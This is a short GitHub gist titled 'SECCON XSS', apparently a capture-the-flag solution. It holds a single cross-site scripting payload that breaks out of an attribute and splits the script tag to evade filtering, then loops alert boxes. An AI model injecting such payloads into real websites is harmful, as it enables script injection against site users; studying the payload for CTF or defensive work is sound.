Skip to content

Instantly share code, notes, and snippets.

@makotoshimazu
Created July 19, 2014 14:51
Show Gist options
  • Save makotoshimazu/46667808510a3ab96c32 to your computer and use it in GitHub Desktop.
Save makotoshimazu/46667808510a3ab96c32 to your computer and use it in GitHub Desktop.
SECCON XSS
"<input type="button" onclick="document.write('<scrip'+'t>for(i=0;i<1000;i++){alert(¥'X'+'SS¥');}</scrip'+'t>')" value="xxx"/>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment